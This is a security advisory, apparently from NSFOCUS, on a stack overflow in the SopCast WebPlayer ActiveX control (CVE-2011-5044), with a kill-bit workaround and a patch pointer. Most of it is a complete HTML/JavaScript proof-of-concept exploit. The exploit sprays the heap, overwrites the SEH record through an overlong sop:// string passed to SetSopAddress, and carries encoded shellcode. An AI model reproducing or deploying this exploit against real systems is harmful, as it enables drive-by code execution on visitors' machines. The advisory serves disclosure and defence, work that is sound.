SopCast WebPlayer ActiveX Control SetSopAddress Method Stack Overflow Vulnerability

Release date: 2010-08-11
Update date: 2010-08-19

Affected systems:
Sopcast SopCast WebPlayer ActiveX 3.2.9
Description:
CVE(CAN) ID: CVE-2011-5044

SopCast WebPlayer is a free online streaming media player.

The SopCast WebPlayer ActiveX control (sopocx.ocx) does not correctly handle an overly long ChannelName property value. A user who is tricked into visiting a malicious web page that supplies an overly long sop:// URL string can trigger a stack overflow, leading to arbitrary code execution.

<*Source: Sud0
  
  Links: http://secunia.com/advisories/40940/
         http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-059-sopcast-unicode-bof-remote-exploit/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear their own risk!

<html>
<Center>
<H1>Sopcast POC by Sud0<br></H1>
</Center>
<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object>
<script>
// ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack

var nops = unescape("%49%41");  // some nice nops on ECX
var ppr = unescape("%49%58%49%58%49%c3");  // Pop EAX / pop EAX / Ret
var ppraddy = 0x20260078;
var BlockSize = 0x200000;
var BlockHeaderSize = 0x26;
var PPRSize = 0x6;
var nopSize = BlockSize - (PPRSize + BlockHeaderSize);
var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2);
var Spray = new Array();
while (nops.length<nopSize)
{
    nops += nops;
}
nops = nops.substring(0,nopSize);
for (i=0;i<heapBlocks;i++)
{
    Spray[i] = nops +  ppr;
}
// ######################################### end of spraying

var buffSize = 522;   // (516 + 6 = sop:// )offset to overwrite EIP
var x="sop://";
while (x.length<buffSize) x += unescape("%41");
x+=unescape("%41");
x+=unescape("%41");
x+=unescape("%87");  //low unicode bytes of seh destination address 0035 (0x20260087)
x+="&#133;";  //High unicode bytes of seh destination address 2026 (0x20260087)
x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A");
x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");

// some junk before shellcode
for (i=0;i<330;i++)
{
    x+=unescape("%41");
}

// messagebox shellcode
x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA";
x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP";
x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw";
x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML";
x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK";
x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO";
x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN";
x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";

// some junk after shellcode
for (i=0;i<40000;i++)
{
    x+=unescape("%41");
}

// calling the boom
boom.ChannelName=x; // setting channel name
boom.SetSopAddress(x); // getting address to trigger the boom

</script>
</html>

Recommendations:
Workaround:

* Set the kill bit for clsid: 8FEFF364-6A5F-4966-A917-A3AC28411659.

Vendor patch:

Sopcast
-------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

http://www.sopcast.org/

This security vulnerability was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.